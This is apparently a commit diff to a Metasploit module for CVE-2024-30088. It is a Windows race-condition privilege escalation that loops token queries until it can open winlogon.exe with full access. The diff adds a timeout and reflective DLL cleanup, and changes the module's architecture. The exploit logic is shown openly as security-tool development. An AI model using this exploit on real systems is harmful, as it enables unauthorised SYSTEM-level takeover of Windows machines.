Responded to comments

jheysel-r7 · jheysel-r7 · commit 6689614d8fe9 · 2024-08-22T13:06:29.000-07:00
diff --git a/data/exploits/CVE-2024-30088/CVE-2024-30088.x64.dll b/data/exploits/CVE-2024-30088/CVE-2024-30088.x64.dll
diff --git a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.vcxproj b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.vcxproj
@@ -223,9 +223,11 @@
   <ItemGroup>
     <ClCompile Include="dllmain.c" />
     <ClCompile Include="exploit.c" />
+    <ClCompile Include="ReflectiveFreeAndExitThread.c" />
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="exploit.h" />
+    <ClInclude Include="ReflectiveFreeAndExitThread.h" />
   </ItemGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">
diff --git a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
diff --git a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.h b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.h
@@ -0,0 +1,8 @@
+#ifndef _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
+#define _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
+
+#include <windows.h>
+
+VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode);
+
+#endif
diff --git a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c
@@ -12,6 +12,7 @@ HANDLE exploit();
 int main(LPVOID address) {
 	HANDLE winlogon_handle = exploit();
 	*(HANDLE*)address = winlogon_handle;
+	ReflectiveFreeAndExitThread(hAppInstance, 0);
 	return 1;
 }
 
diff --git a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c
@@ -99,11 +99,12 @@ HANDLE exploit() {
 
 	HANDLE hWinLogon = INVALID_HANDLE_VALUE;
 	ULONG pid = GetPidByName("winlogon.exe");
+	DWORD time1 = GetTickCount();
+
 	while (1) {
 		HANDLE h = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RaceThread, 0, 0, 0);
 		SetThreadPriority(h, THREAD_PRIORITY_TIME_CRITICAL);
 
-		//DebugBreak();
 		for (int i = 0; i < 5000; i++)
 			pQueryInfoToken(hToken, (TOKEN_INFORMATION_CLASS)22, TokenInfo, Infolen, &retlen);
 
@@ -112,6 +113,12 @@ HANDLE exploit() {
 		hWinLogon = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
 		if (hWinLogon)
 			break;
+
+		DWORD time2 = GetTickCount();
+		if ((time2 - time1) >= (60 * 5 * 1000)) {
+			printf("Timeout reached, exiting loop.\n");
+			break;
+		}
 	}
 
 	return hWinLogon;
diff --git a/modules/exploits/windows/local/cve_2024_30088_authz_basep.rb b/modules/exploits/windows/local/cve_2024_30088_authz_basep.rb
@@ -43,7 +43,7 @@ def initialize(info = {})
         'Platform' => 'win',
         'Privileged' => true,
         'SessionTypes' => [ 'meterpreter' ],
-        'Arch' => [ ARCH_CMD ],
+        'Arch' => [ ARCH_X64 ],
         'Targets' => [
           [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
         ],
@@ -137,6 +137,8 @@ def get_winlogon_handle
     if current_memory != initial_memory
       winlogon_handle = current_memory.unpack('Q<').first
     end
+
+    session.railgun.kernel32.VirtualFree(address, 0, MEM_RELEASE)
     winlogon_handle
   end
 

Original file line number	Diff line number	Diff line change
`@@ -12,6 +12,7 @@ HANDLE exploit();`
`12`	`12`	`int main(LPVOID address) {`
`13`	`13`	`HANDLE winlogon_handle = exploit();`
`14`	`14`	`(HANDLE)address = winlogon_handle;`
	`15`	`+ ReflectiveFreeAndExitThread(hAppInstance, 0);`
`15`	`16`	`return 1;`
`16`	`17`	`}`
`17`	`18`